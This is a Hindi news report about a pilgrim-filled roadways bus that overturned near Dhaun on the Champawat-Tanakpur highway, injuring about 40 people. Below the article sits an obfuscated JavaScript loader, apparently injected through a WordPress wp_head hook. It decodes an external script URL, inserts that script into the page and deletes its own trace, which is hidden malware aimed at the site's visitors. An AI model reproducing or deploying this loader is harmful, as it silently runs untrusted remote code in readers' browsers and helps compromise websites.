Saturday, July 27, 2024
spot_img

चंपावत में सड़क पर पलटी यात्रियों से भरी रोडवेज की बस! 40 यात्री घायल

चंपावत जिले में धौन के समीप हाईवे पर रोडवेज की बस का देर रात एक्सीडेंट हो गया। पुलिस प्रशासन ने रेस्क्यू अभियान चला बस दुर्घटना में घायलों और अन्य यात्रियों को जिला मुख्यालय पहुंचाया। एक्सीडेंट की सूचना मिलते ही उच्चाधिकारी मौके पर पहुंचे। रोडवेज बस पलटने के कारण हुई सड़क दुर्घटना में अभी तक किसी की जान के नुकसान की सूचना नहीं है।

चंपावत जिले में देर रात सड़क दुर्घटना हो गई। रविवार की रात को यात्रियों से भरी एक बस चंपावत-टनकपुर एनएच पर धौन के समीप दुर्घटनाग्रस्त हो गई। बस में 60 के करीब यात्री बताए जा रहे हैं। बस की दुर्घटना की सूचना मिलते ही पुलिस प्रशासन की टीम मौके पर पहुंच गई। पुलिस ने स्थानीय लोगों के साथ मिलकर मौके पर राहत बचाव का कार्य शुरू किया। फिलहाल किसी तरह की जनहानि होने की सूचना नहीं मिली है। वहीं जिला आपदा नियंत्रण कक्ष से प्राप्त सूचना के अनुसार रविवार लगभग 10:04 बजे धौंन से एक किलोमीटर चंपावत की ओर रीठा साहिब जाने वाली बस सड़क पर पलट गई। सूचना प्राप्त होने के तत्काल बाद जिला प्रशासन, पुलिस और राहत बचाव दल मौके पर पहुंच गए। चंपावत के एसपी देवेंद्र पींचा ने बताया कि पुलिस टीम समय पर मौके पर पहुंच चुकी थी. वे भी दुर्घटना स्थल पर पहुंच चुके थे. पुलिस द्वारा तत्काल राहत कार्य शुरू कर दिया गया। आपदा राहत की टीम भी तत्काल मौके पर पहुंची। बस में 50 से 60 यात्री सवार बताए जा रहे हैं. घायलों को जिला अस्पताल में इलाज हेतु भेजा गया है। घायलों के अलावा सुरक्षित यात्रियों को रैन बसेरा गौरलचौड़ में ठहराने की व्यवस्था की गई है। बताया जा रहा है कि बस में सवार लोग रीठा साहिब गुरुद्वारे से दर्शन कर लौट रहे थे। इस दौरान तीर्थयात्रियों से भरी बस के ब्रेक फेल हो गए। इस कारण कारण बस अनियंत्रित होकर चंपावत टनकपुर हाइवे पर पलट गई। बस पलटते ही उसमें सवार यात्रियों की चीख-पुकार मच गई। गनीमत रही कि बस खाई में नहीं गिरी। इस हादसे में तकरीबन 40 तीर्थयात्रियों को चोट आई है। घायलों को जिला अस्पताल लाया गया। जिला अस्पताल की पूरी टीम द्वारा घायलों को प्राथमिक उपचार दिया गया। 6 मरीजी को गंभीर चोट आने से उनको हायर सेंटर रेफर किया गया।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>